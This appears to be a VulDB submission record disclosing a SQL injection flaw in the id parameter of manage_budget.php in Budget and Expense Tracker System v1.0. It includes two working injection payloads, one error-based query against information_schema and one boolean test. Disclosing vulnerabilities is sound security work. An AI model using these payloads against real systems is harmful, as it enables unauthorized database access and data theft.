| Title | Budget and Expense Tracker System v1.0 /expense_budget/admin/budget/manage_budget.php GET parameter id exists SQL injection vulnerability |
|---|
| Description | An issue was discovered in Budget and Expense Tracker System v1.0.
There is a SQL injection that can directly issue instructions to the background database system via /expense_budget/admin/budget/manage_budget.php?id.
Payload1: id=1' and (select 2 from(select count(*),concat(0x55565758,(select (elt(888=888,1))),0x65666768,floor(rand(0)*2))x from information_schema.plugins group by x)a) and 'a'='a
Payload2: id=1' and 777=777 and 'GSD'='GSD |
|---|
| Source | https://github.com/wucwu1/CVEApplication/blob/main/SQL.md |
|---|
| User | wucwu1 (UID 46807) |
|---|
| Submission | 17.05.2023 03:38 (3 years ago) |
|---|
| Moderation | 17.05.2023 18:53 (15 hours later) |
|---|
| Status | Accepted |
|---|
| VulDB Entry | 229278 [SourceCodester Budget and Expense Tracker System 1.0 GET Parameter manage_budget.php ID SQL Injection] |
|---|
| Points | 20 |
|---|